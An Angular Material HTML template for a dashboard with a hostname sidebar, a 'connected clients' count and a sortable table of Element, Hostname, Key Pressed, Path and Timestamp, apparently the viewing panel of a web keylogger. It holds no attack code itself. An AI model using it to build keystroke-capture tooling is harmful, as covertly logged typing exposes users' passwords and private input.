<mat-toolbar color="primary">

  <mat-toolbar-row>
    <span style="margin-right: 10px">
      <mat-spinner [diameter]="20" [color]="'warn'"></mat-spinner>
    </span>
    <span>
      {{title}}
    </span>

    <span class="divider"></span>

    <!-- search bar -->
    <span class="search-bar" [hidden]="!showFilter">

      <button mat-icon-button>
        <mat-icon>search</mat-icon>
      </button>

      <mat-form-field floatLabel="never">
        <input matInput (keyup)="applyFilter($event.target.value)" placeholder="Search something..">
      </mat-form-field>

      <button mat-icon-button (click)="toggleFilter()">
        <mat-icon>clear</mat-icon>
      </button>

    </span>

    <!-- search button -->
    <span [hidden]="showFilter">
      <button mat-icon-button (click)="toggleFilter()" matTooltip="Filter">
        <mat-icon>search</mat-icon>
      </button>
    </span>

    <span class="clients-button" [hidden]="!clients.length">
      <button mat-icon-button matTooltip="Connected clients">
        <mat-icon>people</mat-icon> {{clients.length}}
      </button>
    </span>

  </mat-toolbar-row>

</mat-toolbar>

<mat-sidenav-container>

  <mat-sidenav mode="side" opened="true" disableClose="true">
    <h3>
      <mat-icon matListIcon>layers</mat-icon> Hostnames
    </h3>

    <mat-selection-list (selectionChange)="onSelectionChange()" #channels>
      <mat-list-option *ngFor="let host of hostnames" [value]="host">
        {{host}}
      </mat-list-option>
    </mat-selection-list>

  </mat-sidenav>

  <mat-sidenav-content>

    <mat-table #table [dataSource]="dataSource" matSort>

      <!-- Position Column -->
      <ng-container matColumnDef="element">
        <mat-header-cell *matHeaderCellDef mat-sort-header>Element</mat-header-cell>
        <mat-cell *matCellDef="let element"> {{element.element}} </mat-cell>
      </ng-container>

      <!-- Name Column -->
      <ng-container matColumnDef="hostname">
        <mat-header-cell *matHeaderCellDef mat-sort-header>Hostname</mat-header-cell>
        <mat-cell *matCellDef="let element"> {{element.hostname}} </mat-cell>
      </ng-container>

      <!-- Weight Column -->
      <ng-container matColumnDef="key">
        <mat-header-cell *matHeaderCellDef mat-sort-header>Key Pressed</mat-header-cell>
        <mat-cell *matCellDef="let element"> {{element.key}} </mat-cell>
      </ng-container>

      <!-- Symbol Column -->
      <ng-container matColumnDef="path">
        <mat-header-cell *matHeaderCellDef mat-sort-header>Path</mat-header-cell>
        <mat-cell *matCellDef="let element"> {{element.path}} </mat-cell>
      </ng-container>

      <!-- Symbol Column -->
      <ng-container matColumnDef="timestamp">
        <mat-header-cell *matHeaderCellDef mat-sort-header>Timestamp</mat-header-cell>
        <mat-cell *matCellDef="let element"> {{element.timestamp}} </mat-cell>
      </ng-container>

      <mat-header-row *matHeaderRowDef="displayedColumns"></mat-header-row>
      <mat-row *matRowDef="let row; columns: displayedColumns;"></mat-row>

    </mat-table>

  </mat-sidenav-content>

</mat-sidenav-container>
